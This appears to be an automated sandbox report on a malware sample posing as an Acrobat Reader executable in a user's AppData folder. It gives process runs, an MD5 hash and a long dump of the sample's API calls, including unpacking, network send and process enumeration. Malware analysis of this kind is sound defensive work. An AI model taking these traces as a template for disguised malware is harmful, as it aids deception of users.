                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:9
                        Start time:17:07:12
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:17:07:20
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:13
                        Start time:17:08:00
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:15
                        Start time:17:09:00
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false


                          Execution Graph

                          Execution Coverage:7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:8.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:43
                          execution_graph: [rendered call-graph node/edge dump, not reproducible as text; the visible nodes reference the APIs GetModuleFileNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, RtlAllocateHeap, RaiseException, GetModuleHandleExW, GetProcAddress, ExitProcess, InterlockedDecrement and WSAStartup, plus CRT helpers such as __calloc_impl, _wcsncat, _wcscpy and _memmove]
63859->64781 64789 b0d500 53 API calls __cinit 63859->64789 64790 b0d420 53 API calls 63859->64790 64791 b0d2d2 63859->64791 64797 b5f211 339 API calls 63859->64797 64798 b5f4df 339 API calls 63859->64798 64799 b1cf79 49 API calls 63859->64799 64800 b5d21a 82 API calls Mailbox 63859->64800 64801 b489e0 53 API calls 63859->64801 64802 b0d772 55 API calls 63859->64802 64803 b4d231 50 API calls 63859->64803 63861->63704 63862->63704 63863->63677 63865 b084be 63864->63865 63877 b084ba 63864->63877 63866 b75592 __i64tow 63865->63866 63867 b084d2 63865->63867 63868 b75494 63865->63868 63876 b084ea __itow Mailbox _wcscpy 63865->63876 64807 b2234b 80 API calls 3 library calls 63867->64807 63869 b7549d 63868->63869 63870 b7557a 63868->63870 63875 b754bc 63869->63875 63869->63876 64808 b2234b 80 API calls 3 library calls 63870->64808 63873 b2010a 48 API calls 63874 b084f4 63873->63874 63874->63877 63879 b0caee 48 API calls 63874->63879 63878 b2010a 48 API calls 63875->63878 63876->63873 63877->63695 63880 b754d9 63878->63880 63879->63877 63881 b2010a 48 API calls 63880->63881 63882 b754ff 63881->63882 63882->63877 63883 b0caee 48 API calls 63882->63883 63883->63877 63885 b0d8ac 63884->63885 63892 b0d8db Mailbox 63884->63892 63886 b0d8ff 63885->63886 63888 b0d8b2 Mailbox 63885->63888 63887 b0c935 48 API calls 63886->63887 63887->63892 63889 b0d8c7 63888->63889 63890 b74e9b 63888->63890 63891 b74e72 VariantClear 63889->63891 63889->63892 63890->63892 64809 b3a599 InterlockedDecrement 63890->64809 63891->63892 63892->63666 63894->63682 63896 b5cd21 63895->63896 63897 b5cd46 63895->63897 63898 b0ca8e 48 API calls 63896->63898 63897->63749 63899 b5cd2d 63898->63899 63917 b5c8b7 63899->63917 63901->63746 63902->63757 63904 b0cad0 63903->63904 63905 b0ca9a 63903->63905 63906 b0cae3 63904->63906 63907 b0cad9 63904->63907 63910 b2010a 48 API calls 63905->63910 63909 b0c4cd 48 API calls 63906->63909 63908 b07e53 48 API calls 63907->63908 63914 b0cac6 63908->63914 63909->63914 63911 
b0caad 63910->63911 63912 b74f11 63911->63912 63913 b0cab8 63911->63913 63912->63914 63915 b0d3d2 48 API calls 63912->63915 63913->63914 63981 b0caee 63913->63981 63914->63757 63915->63914 63919 b5c914 63917->63919 63920 b5c8f7 63917->63920 63975 b5c235 339 API calls Mailbox 63919->63975 63920->63919 63921 b5cc61 63920->63921 63922 b5c934 63920->63922 63923 b5cc6e 63921->63923 63924 b5cca9 63921->63924 63922->63919 63953 b3abf3 63922->63953 63971 b1d6b4 48 API calls 63923->63971 63924->63919 63927 b5ccb6 63924->63927 63926 b5c964 63926->63919 63928 b5c973 63926->63928 63973 b1d6b4 48 API calls 63927->63973 63940 b5c9a1 63928->63940 63957 b3a8c8 63928->63957 63930 b5cc87 63972 b497b6 89 API calls 63930->63972 63934 b5ccd6 63974 b4503c 91 API calls Mailbox 63934->63974 63936 b5cadc VariantInit 63943 b5cb11 _memset 63936->63943 63939 b5ca4a 63939->63936 63941 b5ca86 VariantClear 63939->63941 63940->63939 63967 b3a25b 106 API calls 63940->63967 63941->63939 63942 b5caa5 SysAllocString 63941->63942 63942->63939 63944 b5cb8e 63943->63944 63945 b5cbb4 63943->63945 63968 b5c235 339 API calls Mailbox 63944->63968 63969 b4a6f6 103 API calls 63945->63969 63948 b5cbad 63949 b5cc41 VariantClear 63948->63949 63950 b5cc52 63949->63950 63950->63897 63951 b5cbce 63951->63949 63970 b4a6f6 103 API calls 63951->63970 63954 b3ac04 __wsetenvp 63953->63954 63956 b3ac16 63953->63956 63954->63956 63976 b03bcf 63954->63976 63956->63926 63959 b3a8f2 63957->63959 63958 b3a9ed SysFreeString 63962 b3a9f9 63958->63962 63959->63958 63960 b3a90a 63959->63960 63961 b3aa7e 63959->63961 63959->63962 63960->63940 63961->63960 63961->63962 63963 b3aad9 SysFreeString 63961->63963 63964 b3aac9 lstrcmpiW 63961->63964 63962->63960 63980 b3a78a RaiseException 63962->63980 63963->63961 63964->63963 63966 b3aafa SysFreeString 63964->63966 63966->63962 63967->63940 63968->63948 63969->63951 63970->63951 63971->63930 63972->63950 63973->63934 63974->63950 63975->63950 63977 b03bd9 __wsetenvp 63976->63977 63978 
b2010a 48 API calls 63977->63978 63979 b03bee _wcscpy 63978->63979 63979->63956 63980->63962 63982 b0cafd __wsetenvp _memmove 63981->63982 63983 b2010a 48 API calls 63982->63983 63984 b0cb3b 63983->63984 63984->63914 63985->63778 63986->63762 63987->63774 63988->63768 63989->63776 63990->63792 63991->63787 63994 b0d815 63992->63994 63995 b0d828 _memmove 63992->63995 63993 b2010a 48 API calls 63993->63995 63994->63993 63994->63995 63995->63803 63997 b7787b 63996->63997 64000 b1406c 63996->64000 64172 b4d520 86 API calls 4 library calls 63997->64172 63999 b7788c 64173 b4d520 86 API calls 4 library calls 63999->64173 64000->63999 64010 b140a6 _memmove 64000->64010 64002 b14185 64002->63821 64003 b14175 64003->64002 64171 b5d21a 82 API calls Mailbox 64003->64171 64005 b141f1 64005->63821 64006 b2010a 48 API calls 64006->64010 64007 b0fa40 339 API calls 64007->64010 64008 b778d8 64174 b4d520 86 API calls 4 library calls 64008->64174 64010->64002 64010->64003 64010->64006 64010->64007 64010->64008 64175 b623c5 64011->64175 64015 b0cdb4 48 API calls 64014->64015 64016 b1f572 64015->64016 64017 b775d1 Sleep 64016->64017 64018 b1f57a timeGetTime 64016->64018 64019 b0cdb4 48 API calls 64018->64019 64020 b1f590 64019->64020 64265 b0e1f0 64020->64265 64497 b522e5 64023->64497 64025 b51090 64025->63818 64027 b0d3d2 48 API calls 64026->64027 64028 b6354a 64027->64028 64029 b0d3d2 48 API calls 64028->64029 64030 b63553 64029->64030 64031 b0d3d2 48 API calls 64030->64031 64032 b6355c 64031->64032 64033 b084a6 81 API calls 64032->64033 64042 b635e9 Mailbox 64032->64042 64034 b63580 64033->64034 64687 b63d7b 64034->64687 64042->63818 64115 b084a6 81 API calls 64114->64115 64116 b4eff2 64115->64116 64748 b478ad GetFullPathNameW 64116->64748 64121 b4f04b CoInitialize 64123 b4f06c 64121->64123 64124 b084a6 81 API calls 64123->64124 64131 b4f070 Mailbox 64123->64131 64125 b4f09d 64124->64125 64131->63818 64147 b595e0 64146->64147 64147->63818 64149 b05105 64148->64149 64150 b050f6 
64148->64150 64149->64150 64151 b0510a FindCloseChangeNotification 64149->64151 64150->63818 64151->64150 64153 b084a6 81 API calls 64152->64153 64154 b56fd6 SetWindowTextW 64153->64154 64154->63818 64156 b084a6 81 API calls 64155->64156 64157 b4dcfc 64156->64157 64764 b46d6d 64157->64764 64159 b4dd06 64159->63818 64161 b0cdb4 48 API calls 64160->64161 64162 b59515 64161->64162 64163 b4be47 50 API calls 64162->64163 64164 b59522 64163->64164 64165 b5952f send 64164->64165 64166 b59546 64165->64166 64167 b59552 WSAGetLastError 64166->64167 64168 b5956a 64166->64168 64167->64168 64168->63818 64169->63819 64170->63818 64171->64005 64172->63999 64173->64002 64174->64002 64176 b623eb _memset 64175->64176 64177 b62452 64176->64177 64178 b62428 64176->64178 64181 b0cdb4 48 API calls 64177->64181 64187 b62476 64177->64187 64253 b0cdb4 64178->64253 64180 b62433 64184 b0cdb4 48 API calls 64180->64184 64180->64187 64183 b62448 64181->64183 64182 b624b0 64186 b084a6 81 API calls 64182->64186 64189 b0cdb4 48 API calls 64183->64189 64184->64183 64185 b0cdb4 48 API calls 64185->64182 64188 b624d4 64186->64188 64187->64182 64187->64185 64190 b03bcf 48 API calls 64188->64190 64189->64187 64191 b624de 64190->64191 64192 b625a1 64191->64192 64193 b624e8 64191->64193 64195 b625d3 GetCurrentDirectoryW 64192->64195 64198 b084a6 81 API calls 64192->64198 64194 b084a6 81 API calls 64193->64194 64196 b624f9 64194->64196 64197 b2010a 48 API calls 64195->64197 64199 b03bcf 48 API calls 64196->64199 64200 b625f8 GetCurrentDirectoryW 64197->64200 64201 b625b8 64198->64201 64202 b62503 64199->64202 64203 b62605 64200->64203 64204 b03bcf 48 API calls 64201->64204 64205 b084a6 81 API calls 64202->64205 64209 b0ca8e 48 API calls 64203->64209 64214 b6263e 64203->64214 64206 b625c2 __wsetenvp 64204->64206 64206->64195 64206->64214 64254 b0cdc5 64253->64254 64255 b0cdca 64253->64255 64254->64255 64264 b22241 48 API calls 64254->64264 64255->64180 64257 b0ce07 64257->64180 64264->64257 64266 b0e216 
64265->64266 64326 b0e226 Mailbox 64265->64326 64267 b0e670 64266->64267 64266->64326 64395 b1ecee 339 API calls 64267->64395 64268 b4d520 86 API calls 64268->64326 64269 b0e4e7 64271 b0e4fd 64269->64271 64396 b0322e 16 API calls 64269->64396 64271->63818 64273 b0e681 64273->64271 64274 b0e68e 64273->64274 64397 b1ec33 339 API calls Mailbox 64274->64397 64275 b0e26c PeekMessageW 64275->64326 64277 b0e695 LockWindowUpdate DestroyWindow GetMessageW 64277->64271 64280 b0e6c7 64277->64280 64278 b75b13 Sleep 64278->64326 64281 b762a7 TranslateMessage DispatchMessageW GetMessageW 64280->64281 64281->64281 64283 b1cf79 49 API calls 64283->64326 64285 b0e657 PeekMessageW 64285->64326 64286 b0e517 timeGetTime 64286->64326 64288 b2010a 48 API calls 64288->64326 64289 b0c935 48 API calls 64289->64326 64290 b0e641 TranslateMessage DispatchMessageW 64290->64285 64291 b75dfc WaitForSingleObject 64292 b75e19 GetExitCodeProcess CloseHandle 64291->64292 64291->64326 64292->64326 64293 b0d3d2 48 API calls 64322 b75cce Mailbox 64293->64322 64294 b76147 Sleep 64294->64322 64295 b0e6cc timeGetTime 64398 b1cf79 49 API calls 64295->64398 64296 b75feb Sleep 64296->64326 64301 b761de GetExitCodeProcess 64305 b761f4 WaitForSingleObject 64301->64305 64306 b7620a CloseHandle 64301->64306 64303 b01000 315 API calls 64303->64326 64305->64306 64305->64326 64306->64322 64307 b75cea Sleep 64307->64326 64308 b75cd7 Sleep 64308->64307 64309 b68a48 108 API calls 64309->64322 64310 b01dce 107 API calls 64310->64326 64312 b76266 Sleep 64312->64326 64313 b0caee 48 API calls 64313->64322 64318 b0fa40 315 API calls 64318->64326 64320 b144e0 315 API calls 64320->64326 64321 b13680 315 API calls 64321->64326 64322->64293 64322->64301 64322->64307 64322->64308 64322->64309 64322->64312 64322->64313 64322->64326 64400 b456dc 49 API calls Mailbox 64322->64400 64401 b1cf79 49 API calls 64322->64401 64402 b0d380 64322->64402 64406 b01000 339 API calls 64322->64406 64408 b5d12a 50 API calls 64322->64408 64409 
b48355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 64322->64409 64410 b1e3a5 timeGetTime 64322->64410 64411 b46f5b CreateToolhelp32Snapshot Process32FirstW 64322->64411 64324 b0caee 48 API calls 64324->64326 64325 b0d380 55 API calls 64325->64326 64326->64268 64326->64269 64326->64275 64326->64278 64326->64283 64326->64285 64326->64286 64326->64288 64326->64289 64326->64290 64326->64291 64326->64294 64326->64295 64326->64296 64326->64303 64326->64307 64326->64310 64326->64318 64326->64320 64326->64321 64326->64322 64326->64324 64326->64325 64327 b0e7e0 64326->64327 64334 b0ea00 64326->64334 64384 b1f381 64326->64384 64389 b1ed1a 64326->64389 64394 b0e7b0 339 API calls Mailbox 64326->64394 64399 b68b20 48 API calls 64326->64399 64407 b1e3a5 timeGetTime 64326->64407 64328 b0e7fd 64327->64328 64330 b0e80f 64327->64330 64418 b0dcd0 64328->64418 64449 b4d520 86 API calls 4 library calls 64330->64449 64331 b0e806 64331->64326 64333 b798e8 64333->64333 64335 b0ea20 64334->64335 64336 b0fa40 339 API calls 64335->64336 64340 b0ea89 64335->64340 64337 b79919 64336->64337 64337->64340 64457 b4d520 86 API calls 4 library calls 64337->64457 64338 b799bc 64460 b4d520 86 API calls 4 library calls 64338->64460 64339 b0fa40 339 API calls 64366 b0ecd7 Mailbox 64339->64366 64345 b0d3d2 48 API calls 64340->64345 64364 b0eb18 64340->64364 64340->64366 64342 b0d3d2 48 API calls 64344 b79997 64342->64344 64459 b21b2a 52 API calls __cinit 64344->64459 64347 b79963 64345->64347 64458 b21b2a 52 API calls __cinit 64347->64458 64348 b0d380 55 API calls 64348->64366 64350 b79d70 64469 b5e2fb 339 API calls Mailbox 64350->64469 64352 b79e49 64474 b4d520 86 API calls 4 library calls 64352->64474 64353 b79dc2 64471 b4d520 86 API calls 4 library calls 64353->64471 64354 b79ddf 64472 b5c235 339 API calls Mailbox 64354->64472 64358 b0342c 48 API calls 64358->64366 64362 b114a0 48 API calls 64362->64366 64363 b79df7 64383 b0ef0c Mailbox 64363->64383 64473 
b4d520 86 API calls 4 library calls 64363->64473 64364->64342 64364->64366 64366->64338 64366->64339 64366->64348 64366->64350 64366->64352 64366->64353 64366->64354 64366->64358 64366->64362 64367 b0f56f 64366->64367 64369 b0d805 48 API calls 64366->64369 64370 b4d520 86 API calls 64366->64370 64371 b79a3c 64366->64371 64366->64383 64461 b4a3ee 48 API calls 64366->64461 64462 b5ede9 339 API calls 64366->64462 64467 b3a599 InterlockedDecrement 64366->64467 64468 b5f4df 339 API calls 64366->64468 64367->64383 64470 b4d520 86 API calls 4 library calls 64367->64470 64369->64366 64370->64366 64463 b5d154 48 API calls 64371->64463 64373 b79a48 64375 b79a56 64373->64375 64376 b79a9b 64373->64376 64383->64326 64386 b7ee11 64384->64386 64388 b1f390 64384->64388 64385 b7ee46 64386->64385 64387 b7ee28 TranslateAcceleratorW 64386->64387 64387->64388 64388->64326 64390 b1ed2c 64389->64390 64391 b1ed34 64389->64391 64390->64326 64391->64390 64392 b1ed5e IsDialogMessageW 64391->64392 64393 b7ebec GetClassLongW 64391->64393 64392->64390 64392->64391 64393->64391 64393->64392 64394->64326 64395->64269 64396->64273 64397->64277 64398->64326 64399->64326 64400->64322 64401->64322 64403 b0d38b 64402->64403 64404 b0d3b4 64403->64404 64475 b0d772 55 API calls 64403->64475 64404->64322 64406->64322 64407->64326 64408->64322 64409->64322 64410->64322 64476 b479c2 64411->64476 64413 b46fa4 Process32NextW 64414 b47021 CloseHandle 64413->64414 64415 b46fa0 _wcscat 64413->64415 64414->64322 64415->64413 64415->64414 64416 b2297d __wsplitpath 47 API calls 64415->64416 64482 b21bc7 64415->64482 64416->64415 64419 b0fa40 339 API calls 64418->64419 64431 b0dd0f _memmove 64419->64431 64420 b78dbe 64456 b4d520 86 API calls 4 library calls 64420->64456 64422 b78ddc 64422->64422 64423 b0dd70 64423->64331 64424 b0e12b Mailbox 64428 b2010a 48 API calls 64424->64428 64425 b0e051 64426 b0e066 64425->64426 64427 b78daf 64425->64427 64439 b0decb _memmove 64428->64439 64431->64420 64431->64423 64431->64424 
64432 b2010a 48 API calls 64431->64432 64434 b0deb7 64431->64434 64444 b0df29 64431->64444 64432->64431 64434->64424 64436 b0dec4 64434->64436 64438 b2010a 48 API calls 64436->64438 64437 b78d9e 64438->64439 64439->64444 64442 b0df64 64442->64331 64444->64425 64444->64437 64444->64442 64445 b78d76 64444->64445 64447 b78d51 64444->64447 64451 b05322 339 API calls 64444->64451 64449->64333 64451->64444 64456->64422 64457->64340 64458->64364 64459->64366 64460->64383 64461->64366 64462->64366 64463->64373 64467->64366 64468->64366 64469->64367 64470->64383 64471->64383 64472->64363 64473->64383 64474->64383 64475->64404 64477 b479e9 64476->64477 64481 b479d0 64476->64481 64493 b2224a 58 API calls __wcstoi64 64477->64493 64480 b479ef 64480->64415 64481->64477 64481->64480 64492 b222df GetStringTypeW wcstoxq 64481->64492 64483 b21bd3 64482->64483 64484 b21c48 64482->64484 64492->64481 64493->64480 64498 b52306 64497->64498 64499 b52365 64498->64499 64500 b5230a 64498->64500 64566 b1f0f3 48 API calls 64499->64566 64501 b2010a 48 API calls 64500->64501 64503 b52311 64501->64503 64505 b5231f 64503->64505 64553 b05080 49 API calls 64503->64553 64504 b52379 64508 b5234d 64504->64508 64511 b5243f 64504->64511 64514 b523bb 64504->64514 64507 b084a6 81 API calls 64505->64507 64509 b52331 64507->64509 64508->64025 64554 b04bf9 64509->64554 64573 b4be47 64511->64573 64517 b084a6 81 API calls 64514->64517 64515 b52446 64577 b4689f SetFilePointerEx SetFilePointerEx WriteFile 64515->64577 64523 b523c2 64517->64523 64519 b523f6 64535 b467dc 64519->64535 64520 b52400 64567 b07b6e 64520->64567 64523->64519 64523->64520 64529 b523fe Mailbox 64529->64508 64531 b050ec FindCloseChangeNotification 64529->64531 64533 b52490 64531->64533 64578 b04592 FindCloseChangeNotification 64533->64578 64536 b467f6 64535->64536 64537 b467ec 64535->64537 64539 b467fc 64536->64539 64540 b46808 64536->64540 64595 b46917 SetFilePointerEx SetFilePointerEx WriteFile 64537->64595 64596 b468b9 51 API calls 
64539->64596 64541 b46824 64540->64541 64542 b46811 64540->64542 64579 b0a6d4 64541->64579 64544 b0a6d4 48 API calls 64542->64544 64546 b46816 64544->64546 64552 b467f4 Mailbox 64552->64529 64553->64505 64555 b050ec FindCloseChangeNotification 64554->64555 64556 b04c04 64555->64556 64635 b04b88 64556->64635 64566->64504 64568 b2010a 48 API calls 64567->64568 64569 b07b93 64568->64569 64570 b0a6f8 48 API calls 64569->64570 64571 b07ba2 64570->64571 64574 b4be55 64573->64574 64575 b4be50 64573->64575 64574->64515 64686 b4ae06 50 API calls 2 library calls 64575->64686 64577->64529 64578->64508 64580 b2010a 48 API calls 64579->64580 64595->64552 64596->64552 64636 b74957 64635->64636 64637 b04ba1 CreateFileW 64635->64637 64638 b7495d CreateFileW 64636->64638 64639 b04bc3 64636->64639 64637->64639 64638->64639 64686->64574 64688 b0c4cd 48 API calls 64687->64688 64689 b63d89 64688->64689 64690 b0c4cd 48 API calls 64689->64690 64691 b63d91 64690->64691 64692 b0c4cd 48 API calls 64691->64692 64693 b63d99 64692->64693 64749 b07e53 48 API calls 64748->64749 64750 b478df 64749->64750 64751 b1e617 48 API calls 64750->64751 64752 b478eb 64751->64752 64753 b5267a 64752->64753 64754 b526a4 __wsetenvp 64753->64754 64755 b4f039 64754->64755 64757 b526d8 64754->64757 64759 b52763 64754->64759 64755->64121 64760 b039e8 48 API calls 2 library calls 64755->64760 64757->64755 64762 b1dfd2 60 API calls 64757->64762 64759->64755 64763 b1dfd2 60 API calls 64759->64763 64760->64121 64762->64757 64763->64759 64765 b46d8a __wsetenvp 64764->64765 64766 b46db3 GetFileAttributesW 64765->64766 64767 b46dc5 GetLastError 64766->64767 64771 b46de3 64766->64771 64768 b46de7 64767->64768 64769 b46dd0 CreateDirectoryW 64767->64769 64770 b03bcf 48 API calls 64768->64770 64768->64771 64769->64768 64769->64771 64772 b46df7 _wcsrchr 64770->64772 64771->64159 64772->64771 64773 b46d6d 48 API calls 64772->64773 64774 b46e1b 64773->64774 64774->64771 64775 b46e28 CreateDirectoryW 64774->64775 64775->64771 
64777 b0a9af 64776->64777 64780 b0a9ca 64776->64780 64778 b0b8a7 48 API calls 64777->64778 64779 b0a9b7 CharUpperBuffW 64778->64779 64779->64780 64780->63838 64782 b010f9 64781->64782 64783 b74c5a 64781->64783 64784 b2010a 48 API calls 64782->64784 64785 b01100 64784->64785 64786 b01121 64785->64786 64804 b0113c 48 API calls 64785->64804 64786->63859 64788->63859 64789->63859 64790->63859 64792 b0d30a 64791->64792 64793 b0d2df 64791->64793 64792->63859 64796 b0d2e6 64793->64796 64806 b0d349 53 API calls 64793->64806 64796->64792 64805 b0d349 53 API calls 64796->64805 64797->63859 64798->63859 64799->63859 64800->63859 64801->63859 64802->63859 64803->63859 64804->64786 64805->64792 64806->64796 64807->63876 64808->63876 64809->63892 64810->63725 64811 c830e0 64812 c830f0 64811->64812 64813 c8320a LoadLibraryA 64812->64813 64816 c8324f VirtualProtect VirtualProtect 64812->64816 64814 c83221 64813->64814 64814->64812 64818 c83233 GetProcAddress 64814->64818 64817 c832b4 64816->64817 64817->64817 64818->64814 64819 c83249 ExitProcess 64818->64819 64820 b1e1b8 64821 b7bc27 64820->64821 64824 b479f8 SHGetFolderPathW 64821->64824 64825 b07e53 48 API calls 64824->64825 64826 b47a25 64825->64826 64827 b11118 64828 b1e016 50 API calls 64827->64828 64829 b1112e 64828->64829 64830 b11148 64829->64830 64831 b7abeb 64829->64831 64833 b13680 339 API calls 64830->64833 64859 b1cf79 49 API calls 64831->64859 64854 b0fad8 64833->64854 64835 b7ac2a 64838 b7ac4a Mailbox 64835->64838 64860 b4ba5d 48 API calls 64835->64860 64836 b7b628 Mailbox 64861 b4d520 86 API calls 4 library calls 64838->64861 64839 b10119 64864 b4d520 86 API calls 4 library calls 64839->64864 64842 b0fbf1 64844 b2010a 48 API calls 64844->64854 64845 b11063 64863 b4d520 86 API calls 4 library calls 64845->64863 64846 b7b772 64865 b4d520 86 API calls 4 library calls 64846->64865 64847 b0f6d0 339 API calls 64847->64854 64848 b0c935 48 API calls 64848->64854 64850 b0d3d2 48 API calls 64850->64854 64851 b7b6d2 64852 
b3a599 InterlockedDecrement 64852->64854 64854->64839 64854->64842 64854->64844 64854->64845 64854->64846 64854->64847 64854->64848 64854->64850 64854->64852 64855 b21b2a 52 API calls __cinit 64854->64855 64857 b11230 64854->64857 64858 b11620 59 API calls Mailbox 64854->64858 64855->64854 64856 b7b7d2 64857->64842 64862 b4d520 86 API calls 4 library calls 64857->64862 64858->64854 64859->64835 64860->64838 64861->64836 64862->64845 64863->64851 64864->64846 64865->64856 64866 b0e85b 64869 b0d937 64866->64869 64868 b0e865 64870 b0d9a7 64869->64870 64871 b0d94f 64869->64871 64872 b0d9d0 64870->64872 64877 b4d520 86 API calls 4 library calls 64870->64877 64871->64870 64873 b0fa40 339 API calls 64871->64873 64872->64868 64875 b0d986 64873->64875 64875->64872 64876 b0d89e 50 API calls 64875->64876 64876->64870 64877->64872 64878 b0131c 64879 b0133e 64878->64879 64911 b01624 64879->64911 64884 b0d3d2 48 API calls 64885 b0137e 64884->64885 64886 b0d3d2 48 API calls 64885->64886 64887 b01388 64886->64887 64888 b0d3d2 48 API calls 64887->64888 64889 b01392 64888->64889 64890 b0d3d2 48 API calls 64889->64890 64891 b013d8 64890->64891 64892 b0d3d2 48 API calls 64891->64892 64893 b014bb 64892->64893 64919 b01673 64893->64919 64957 b017e0 64911->64957 64914 b07e53 48 API calls 64915 b01344 64914->64915 64916 b016db 64915->64916 64971 b01867 6 API calls 64916->64971 64918 b01374 64918->64884 64920 b0d3d2 48 API calls 64919->64920 64921 b01683 64920->64921 64922 b0d3d2 48 API calls 64921->64922 64923 b0168b 64922->64923 64972 b07d70 64923->64972 64926 b07d70 48 API calls 64964 b017fc 64957->64964 64960 b017fc 48 API calls 64961 b017f0 64960->64961 64962 b0d3d2 48 API calls 64961->64962 64963 b0165b 64962->64963 64963->64914 64965 b0d3d2 48 API calls 64964->64965 64966 b01807 64965->64966 64967 b0d3d2 48 API calls 64966->64967 64968 b0180f 64967->64968 64969 b0d3d2 48 API calls 64968->64969 64970 b017e8 64969->64970 64970->64960 64971->64918 64973 b0d3d2 48 API calls 64972->64973 
64974 b07d79 64973->64974 64975 b0d3d2 48 API calls 64974->64975 64976 b01693 64975->64976 64976->64926 64979 b26a80 64980 b26a8c _doexit 64979->64980 65016 b28b7b GetStartupInfoW 64980->65016 64982 b26a91 65018 b2a937 GetProcessHeap 64982->65018 64984 b26ae9 64985 b26af4 64984->64985 65100 b26bd0 47 API calls 3 library calls 64984->65100 65019 b287d7 64985->65019 64988 b26afa 64989 b26b05 __RTC_Initialize 64988->64989 65101 b26bd0 47 API calls 3 library calls 64988->65101 65040 b2ba66 64989->65040 64992 b26b14 64993 b26b20 GetCommandLineW 64992->64993 65102 b26bd0 47 API calls 3 library calls 64992->65102 65059 b33c2d GetEnvironmentStringsW 64993->65059 64997 b26b1f 64997->64993 64999 b26b3a 65000 b26b45 64999->65000 65103 b21d7b 47 API calls 3 library calls 64999->65103 65069 b33a64 65000->65069 65004 b26b56 65083 b21db5 65004->65083 65017 b28b91 65016->65017 65017->64982 65018->64984 65108 b21e5a 30 API calls 2 library calls 65019->65108 65021 b287dc 65109 b28ab3 InitializeCriticalSectionAndSpinCount 65021->65109 65023 b287e1 65024 b287e5 65023->65024 65111 b28afd TlsAlloc 65023->65111 65110 b2884d 50 API calls 2 library calls 65024->65110 65027 b287ea 65027->64988 65028 b287f7 65028->65024 65029 b28802 65028->65029 65112 b27616 65029->65112 65032 b28844 65120 b2884d 50 API calls 2 library calls 65032->65120 65035 b28849 65035->64988 65036 b28823 65036->65032 65037 b28829 65036->65037 65119 b28724 47 API calls 4 library calls 65037->65119 65039 b28831 GetCurrentThreadId 65039->64988 65041 b2ba72 _doexit 65040->65041 65129 b28984 65041->65129 65043 b2ba79 65044 b27616 __calloc_crt 47 API calls 65043->65044 65045 b2ba8a 65044->65045 65046 b2baf5 GetStartupInfoW 65045->65046 65047 b2ba95 _doexit @_EH4_CallFilterFunc@8 65045->65047 65054 b2bc33 65046->65054 65056 b2bb0a 65046->65056 65047->64992 65048 b2bcf7 65136 b2bd0b RtlLeaveCriticalSection _doexit 65048->65136 65050 b2bc7c GetStdHandle 65050->65054 65051 b27616 __calloc_crt 47 API calls 65051->65056 65052 
b2bc8e GetFileType 65052->65054 65053 b2bb58 65053->65054 65057 b2bb8a GetFileType 65053->65057 65058 b2bb98 InitializeCriticalSectionAndSpinCount 65053->65058 65054->65048 65054->65050 65054->65052 65055 b2bcbb InitializeCriticalSectionAndSpinCount 65054->65055 65055->65054 65056->65051 65056->65053 65056->65054 65057->65053 65057->65058 65058->65053 65060 b26b30 65059->65060 65061 b33c3e 65059->65061 65065 b3382b GetModuleFileNameW 65060->65065 65062 b27660 __malloc_crt 47 API calls 65061->65062 65063 b33c64 _memmove 65062->65063 65064 b33c7a FreeEnvironmentStringsW 65063->65064 65064->65060 65066 b3385f _wparse_cmdline 65065->65066 65067 b27660 __malloc_crt 47 API calls 65066->65067 65068 b3389f _wparse_cmdline 65066->65068 65067->65068 65068->64999 65070 b33a7d __wsetenvp 65069->65070 65074 b26b4b 65069->65074 65071 b27616 __calloc_crt 47 API calls 65070->65071 65079 b33aa6 __wsetenvp 65071->65079 65072 b33afd 65073 b228ca _free 47 API calls 65072->65073 65073->65074 65074->65004 65104 b21d7b 47 API calls 3 library calls 65074->65104 65075 b27616 __calloc_crt 47 API calls 65075->65079 65076 b33b22 65078 b228ca _free 47 API calls 65076->65078 65078->65074 65079->65072 65079->65074 65079->65075 65079->65076 65080 b33b39 65079->65080 65179 b33317 47 API calls __mbschr_l 65079->65179 65180 b27ab0 IsProcessorFeaturePresent 65080->65180 65084 b21dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 65083->65084 65086 b21e00 __IsNonwritableInCurrentImage 65084->65086 65203 b21b2a 52 API calls __cinit 